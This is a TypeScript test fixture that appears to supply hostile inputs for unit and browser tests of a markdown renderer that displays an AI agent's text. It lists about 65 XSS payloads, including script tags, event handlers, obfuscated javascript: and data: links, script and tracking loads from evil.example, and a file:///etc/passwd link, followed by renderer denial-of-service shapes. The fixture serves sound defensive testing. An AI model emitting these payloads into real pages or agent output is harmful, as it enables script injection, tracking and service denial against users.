// Hostile markdown, shared by the unit test (the tree) and the browser test (the real DOM).
// Each string tries to get script, a navigation, a request or markup out of the agent's text.
export const XSS_CORPUS: string[] = [
  `<script>window.__pwned = 1</script>`,
  `<SCRIPT SRC=//evil.example/x.js></SCRIPT>`,
  `<img src=x onerror="window.__pwned = 1">`,
  `<img src="https://evil.example/track.png">`,
  `<svg onload="window.__pwned = 1"><circle r=5></svg>`,
  `<iframe src="javascript:window.__pwned=1"></iframe>`,
  `<style>@import url(https://evil.example/x.css); body { display: none }</style>`,
  `<details open ontoggle="window.__pwned = 1"><summary>x</summary></details>`,
  `<a href="javascript:window.__pwned=1">raw html link</a>`,
  `<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>`,
  `<form action="https://evil.example"><input name=x></form>`,
  `<base href="https://evil.example/">`,
  `<meta http-equiv="refresh" content="0;url=https://evil.example">`,
  `[click](javascript:window.__pwned=1)`,
  `[click](JaVaScRiPt:window.__pwned=1)`,
  `[click](java\tscript:window.__pwned=1)`,
  `[click](&#106;avascript:window.__pwned=1)`,
  `[click](&#x6A;avascript&colon;window.__pwned=1)`,
  `[click]( javascript:window.__pwned=1 )`,
  `[click](data:text/html,<script>window.__pwned=1</script>)`,
  `[click](data:text/html;base64,PHNjcmlwdD53aW5kb3cuX19wd25lZD0xPC9zY3JpcHQ+)`,
  `[click](vbscript:msgbox(1))`,
  `[click](file:///etc/passwd)`,
  `[click](chrome://browser/content/browser.xhtml)`,
  `[click](about:config)`,
  `[click](resource://gre/modules/Services.sys.mjs)`,
  `[click](blob:https://evil.example/abc)`,
  `[click](//evil.example/protocol-relative)`,
  `[click](/relative/path)`,
  `[click](#fragment)`,
  `[click](mailto:a@b.c)`,
  `[click](zotero:/missing-slash)`,
  `<javascript:window.__pwned=1>`,
  `<data:text/html,<script>1</script>>`,
  `[ref][bad]\n\n[bad]: javascript:window.__pwned=1`,
  `[![img](https://a.example/x.png)](javascript:window.__pwned=1)`,
  `**[bold](javascript:window.__pwned=1)** and _[em](javascript:1)_`,
  `[a](http://x.example "\\" onmouseover=\\"window.__pwned=1")`,
  `[a](http://x.example/"onmouseover="window.__pwned=1)`,
  `![x](javascript:window.__pwned=1)`,
  `![x](https://evil.example/track.png)`,
  `![x](http://evil.example/track.gif)`,
  `![x](data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9IndpbmRvdy5fX3B3bmVkPTEiPjwvc3ZnPg==)`,
  `![x](data:image/png;base64,AAAA" onerror="window.__pwned=1)`,
  `![x](data:image/gif;base64,R0lGODlhAQABAAAAACw=)`,
  `![x](data:text/html,<script>1</script>)`,
  `![x"onerror="window.__pwned=1](https://x.example/y.png)`,
  `| a | b |\n|---|---|\n| <img src=x onerror=window.__pwned=1> | [x](javascript:1) |`,
  "```\"><script>window.__pwned=1</script>\ncode\n```",
  "```js onload=window.__pwned=1\ncode\n```",
  "`<script>window.__pwned=1</script>`",
  `$<img src=x onerror=window.__pwned=1>$ and $$\\href{javascript:window.__pwned=1}{click}$$`,
  `$$\\includegraphics{https://evil.example/x.png}$$`,
  `$\\url{javascript:window.__pwned=1}$ $\\htmlClass{x}{y}$ $\\htmlId{z}{w}$ $\\htmlStyle{color:red}{v}$ $\\htmlData{k=v}{u}$`,
  `$$\\def\\a{\\a\\a}\\a$$`,
  `\\(<b onmouseover=1>x</b>\\) \\[<i>y</i>\\]`,
  `> > > > > > > > <script>window.__pwned=1</script>`,
  `- <script>1</script>\n  - [x](javascript:1)\n    - ![y](javascript:1)`,
  `1. a\n2. b\n\n   <script>window.__pwned=1</script>`,
  `# <img src=x onerror=window.__pwned=1>\n## [h](javascript:1)`,
  `<!-- comment --><script>window.__pwned=1</script><!-- -->`,
  `<![CDATA[<script>window.__pwned=1</script>]]>`,
  `&lt;script&gt;window.__pwned=1&lt;/script&gt; &#60;script&#62;window.__pwned=1&#60;/script&#62; &#x3C;img src=x onerror=1&#x3E;`,
  `<scr<script>ipt>window.__pwned=1</scr</script>ipt>`,
  `\u0000<script>window.__pwned=1</script>\u0000`,
  `[x](zotero://open-pdf/library/items/ABCD1234?page=1"onclick="window.__pwned=1)`,
  `[x](https://a.example/\u2028javascript:1)`,
];

/** Inputs that try to make the renderer slow or deep, with the time (ms) each may take. */
export const HOSTILE_SHAPES: { name: string; text: string; ms: number }[] = [
  { name: "5000 nested blockquotes", text: "> ".repeat(5000) + "deep", ms: 4000 },
  { name: "3000 nested list items", text: Array.from({ length: 3000 }, (_, i) => "  ".repeat(i % 40) + "- item").join("\n"), ms: 4000 },
  { name: "100k open brackets", text: "[".repeat(100_000), ms: 4000 },
  { name: "100k asterisks", text: "*".repeat(100_000), ms: 4000 },
  { name: "100k underscores and backticks", text: "_`".repeat(50_000), ms: 4000 },
  { name: "unclosed link destinations", text: "[a](".repeat(20_000), ms: 4000 },
  { name: "many emphasis delimiters", text: "*a _b **c __d ".repeat(10_000), ms: 4000 },
  { name: "2 MB of text", text: "word ".repeat(400_000), ms: 5000 },
  { name: "20k short paragraphs", text: Array.from({ length: 20_000 }, (_, i) => `para ${i}`).join("\n\n"), ms: 5000 },
  { name: "wide table", text: `|${" a |".repeat(2000)}\n|${"---|".repeat(2000)}\n|${" b |".repeat(2000)}`, ms: 4000 },
  { name: "10k dollar signs", text: "$".repeat(10_000) + " x " + "$$ ".repeat(5000), ms: 4000 },
  { name: "an unclosed display math", text: "$$" + "\\frac{".repeat(5000), ms: 4000 },
  { name: "a megabyte of backslashes", text: "\\".repeat(1_000_000), ms: 5000 },
];
